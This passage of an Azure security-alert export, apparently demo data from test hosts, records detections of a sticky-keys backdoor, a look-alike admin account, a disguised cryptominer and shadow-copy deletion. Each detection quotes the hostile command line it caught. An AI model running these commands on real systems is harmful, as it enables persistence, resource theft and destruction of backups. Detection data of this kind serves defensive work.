""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1630"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.4929053Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.4929053Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.4929053Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
123,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,b3737297-038c-4514-a957-d591384b4256,2518547714843796759_b3737297-038c-4514-a957-d591384b4256,Detection,Microsoft,Sticky keys attack detected,Sticky keys attack detected,Sticky keys attack detected,"Analysis of host data indicates that an attacker may be subverting an accessibility binary (for example sticky keys, onscreen keyboard, narrator) in order to provide backdoor access to the host MSTICALERTSWIN1. ",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg add image file execution options sethc.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1584"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1584"",
""CommandLine"": "".\\reg add image file execution options sethc.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.620324Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.620324Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.620324Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
124,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,4fa26308-1daf-49ee-8880-b194f950d8b0,2518547714833859291_4fa26308-1daf-49ee-8880-b194f950d8b0,Detection,Microsoft,Detected potentially suspicious use of Telegram tool,Detected potentially suspicious use of Telegram tool,Detected potentially suspicious use of Telegram tool,"Analysis of host data shows installation of Telegram, a free cloud-based instant messaging service that exists both for mobile and desktop system. Attackers are known to abuse this service to transfer malicious binaries to any other computer, phone, or tablet.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\tsetup.1.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\tsetup.1.exe c:\\users\\msticadmin\\appdata\\local\\temp\\2\\is-01dd7.tmp\\tsetup.1.0.14.tmp\"" /sl5=\""$250276,19992586,423424,c:\\users\\msticadmin\\downloads\\tsetup.1.0.14.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1064"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""tsetup.1.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1064"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\tsetup.1.exe c:\\users\\msticadmin\\appdata\\local\\temp\\2\\is-01dd7.tmp\\tsetup.1.0.14.tmp\"" /sl5=\""$250276,19992586,423424,c:\\users\\msticadmin\\downloads\\tsetup.1.0.14.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.6140708Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.6140708Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.6140708Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
125,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,d12ed618-567b-4b8f-8241-82ad4c1cb28e,2518547714813699414_d12ed618-567b-4b8f-8241-82ad4c1cb28e,Detection,Microsoft,High risk software detected,High risk software detected,High risk software detected,"Analysis of host data from MSTICALERTSWIN1 detected the usage of software that has been associated with the installation of malware in the past. A common technique utilized in the distribution of malicious software is to package it within otherwise benign tools such as the one seen in this alert. Upon using these tools, the malware can be silently installed in the background.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\bittorrent.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\bittorrent.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1414"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""bittorrent.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1414"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\bittorrent.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.6300585Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.6300585Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.6300585Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
126,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 05:38:06,2019-01-15 05:38:06,3a20bebd-556f-44e6-8a19-569d939458c9,fbaf48de-152a-4aa6-8a69-902b219bf972,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trus was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25592"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total IP Entities"": ""1"",
""Total Account Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 25592
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25592
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 25592
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:48:11,,,
127,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 06:25:57,2019-01-15 06:25:57,fa83104f-178f-4141-9f1c-4f8757c0ca55,1828afac-b4c2-41d9-acbd-7d23b7219557,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25047"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1703"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 25047
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25047
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 9147
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 823
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 500
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 06:36:02,,,
128,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:00,2019-01-15 11:45:00,836318d1-0fa0-4cfe-a3d0-2b1fdbaf2216,2518547480991748435_836318d1-0fa0-4cfe-a3d0-2b1fdbaf2216,Detection,Microsoft,Suspicious Account Creation Detected,Suspicious Account Creation Detected,Suspicious Account Creation Detected,"Analysis of host data on MSTICALERTSWIN1 detected creation or use of a local account adm1nistrator : this account name closely resembles a standard Windows account or group name 'administrator'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""adm1nistrator"",
""Account Session Id"": ""0x0"",
""Suspicious Process"": ""c:\\windows\\system32\\net.exe"",
""Suspicious Command Line"": ""net user adm1nistrator bob_testing /add"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1550"",
""Suspicious Account Name"": ""adm1nistrator"",
""Similar To Account Name"": ""administrator"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""adm1nistrator"",
""Host"": {
""$ref"": ""4""
},
""Type"": ""account"",
""LogonId"": ""0x0""
},
{
""$id"": ""6"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""8"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""9"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""net.exe"",
""Type"": ""file""
},
{
""$id"": ""10"",
""ProcessId"": ""0x1550"",
""CommandLine"": ""net user adm1nistrator bob_testing /add"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:00.8251564Z"",
""ImageFile"": {
""$ref"": ""9""
},
""Account"": {
""$ref"": ""8""
},
""ParentProcess"": {
""$ref"": ""7""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""11"",
""SessionId"": ""0x0"",
""StartTimeUtc"": ""2019-01-15T11:45:00.8251564Z"",
""EndTimeUtc"": ""2019-01-15T11:45:00.8251564Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""5""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:03,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
129,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,54bb943e-7fe9-4146-a43e-4064c8e0049f,2518547480988516756_54bb943e-7fe9-4146-a43e-4064c8e0049f,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.,High,False,"{
""Account Session Id"": ""0x3e4"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x107c"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticalertswin1$"",
""NTDomain"": ""workgroup"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": true,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:03,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
130,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,668ed54c-9e73-4d4f-a9c2-b88fd1b13db0,2518547480988516756_668ed54c-9e73-4d4f-a9c2-b88fd1b13db0,Detection,Microsoft,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Analysis of host data on MSTICALERTSWIN1 detected the execution of a process or command normally associated with digital currency mining.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\suchost.exe"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x107c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x107c"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:03,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
131,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:04,2019-01-15 11:45:04,fa350f8b-2c81-478c-a383-debe0ab0c892,2518547480955968326_fa350f8b-2c81-478c-a383-debe0ab0c892,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware and specifically Ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1590"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=md0FA0lp6ylACLI8tXMVySYKT9S%2FHWJh8VkZ5YrTgSE%3D&spr=https&st=2019-01-14T15:22:59Z&se=2019-04-14T15:37:59Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=bdb7e59d-8ba8-4351-aa6d-eedc6b916aa5\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1590"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:04.4031673Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:04.4031673Z"",
""EndTimeUtc"": ""2019-01-15T11:45:04.4031673Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
